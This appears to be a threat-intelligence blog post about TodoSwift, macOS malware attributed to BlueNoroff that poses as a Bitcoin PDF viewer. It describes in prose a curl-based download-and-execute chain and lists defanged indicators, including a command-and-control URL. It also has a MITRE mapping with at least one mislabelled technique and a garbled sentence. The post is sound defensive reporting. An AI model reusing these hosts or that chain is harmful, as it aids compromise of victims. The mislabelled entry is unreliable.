TodoSwift Malware Disguised as Bitcoin PDF: North Korea’s BlueNoroff Threat Actor Group Strikes Again
On August 16, 2024, Kandji released a technical report on a new macOS malware named "TodoSwift," believed to be connected to the North Korean threat actor group BlueNoroff.
Introduction
On August 16, 2024, Kandji released a technical report on a new macOS malware named "TodoSwift," believed to be connected to the North Korean threat actor group BlueNoroff. The application, which appears to be from the notorious BlueNoroff group, disguises itself as a harmless PDF viewer while deploying sophisticated malware.
Report Overview
BlueNoroff-related malware, such as KandyKorn and RustBucket, making it a significant risk for macOS users, especially those involved in cryptocurrency.
BlueNoroff, a subgroup of the Lazarus Group, is infamous for its financially motivated attacks, often targeting cryptocurrency entities. The TodoSwift malware is the latest tool in their arsenal. They use social engineering tactics to lure victims into downloading a seemingly legitimate application that covertly installs malware on their systems.
TodoSwift operates through a GUI application written in Swift/SwiftUI. It presents itself as a PDF viewer for a document titled "Bitcoin Price Prediction Using Machine Learning." Upon launching, the application displays the PDF to the user while downloading and executing a malicious binary.
The application begins its malicious activity by calling the makeWindowControllers method, which sets up the application's window controller and initiates the download of two URLs. These URLs, hosted on Google Drive and a suspicious domain, buy2x[.]com, are critical to the malware's operation.
The first URL is a Google Drive link to download the PDF file, while the second URL is associated with the command-and-control (C2) server. The malware uses a sophisticated technique involving Swift strings and NSTask objects to execute a series of curl commands, first to download the PDF and then to fetch and execute a stage 2 binary from the C2 server.
Once the stage 2 binary is downloaded to the /tmp directory, the malware alters its permissions using chmod and executes it. This second-stage payload establishes a persistent connection with the C2 server, allowing the threat actor to execute arbitrary commands on the infected system.
Insights and Analysis
The TodoSwift malware represents a severe threat to macOS users, particularly those involved in cryptocurrency. Its use of social engineering tactics, combined with advanced technical methods, makes it highly effective in compromising systems. The fact that the malware is signed with a legitimate developer ID further complicates detection and mitigation efforts. The broader implications of this attack include potential financial losses, data breaches, and the establishment of long-term persistence on affected systems.
To protect against TodoSwift and similar threats, users should avoid downloading applications from untrusted sources, even if they appear to be signed with a legitimate certificate. Regular updates to security software and the operating system are crucial in defending against new and emerging threats. Users should also be cautious of applications requesting access to sensitive information or performing unexpected actions.
TodoSwift is a sophisticated piece of malware that leverages social engineering and advanced technical methods to compromise macOS systems. Its ties to the BlueNoroff threat actor group underscore the ongoing risks posed by state-sponsored cyber operations. Vigilance and robust security practices are essential in mitigating the impact of such threats.
Indicators of Compromise (IOCs):
| Indicator | Type | Description |
|---|---|---|
f1b3ce96462027644f9caa314d3da745dab139ee1cb14fe508234e76bd686f93 | SHA-256 Hash | Hash of the analyzed Mach-O binary. |
hxxps[:]//drive[.]usercontent.google[.]com/download?id=1xflBpAVQrwIS3UQqynb8iEj6gaCIXczo | URL | Google Drive link used to download the Bitcoin-related PDF. |
hxxp[:]//buy2x[.]com/OcMySY5QNkY/ABcTDInKWw/4SqSYtx%2B/EKfP7saoiP/BcA%3D%3D | URL | Command-and-control (C2) server URL used for stage 2 malware download. |
MITRE ATT&CK Mapping:
| Tactic | Technique | ID | Description |
|---|---|---|---|
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 | The malware uses curl commands via NSTask objects to download and execute payloads on the system. |
| Defense Evasion | Signed Binary Proxy Execution: Apple Script | T1216.001 | The application is signed with a legitimate developer ID, allowing it to bypass some security controls. |
| Persistence | Boot or Logon Autostart Execution | T1547 | The malware establishes persistence by executing a stage 2 binary and potentially configuring it to run on startup. |
| Discovery | System Information Discovery | T1082 | The malware gathers system information to determine if it is running on a targeted macOS system. |
| Command and Control | Application Layer Protocol: Web Protocols | T1071.001 | The malware communicates with the C2 server using standard web protocols, making detection more challenging. |
References
April 21 2023 by Jamf Threat Labs
Colson Wilhoit
Comments ()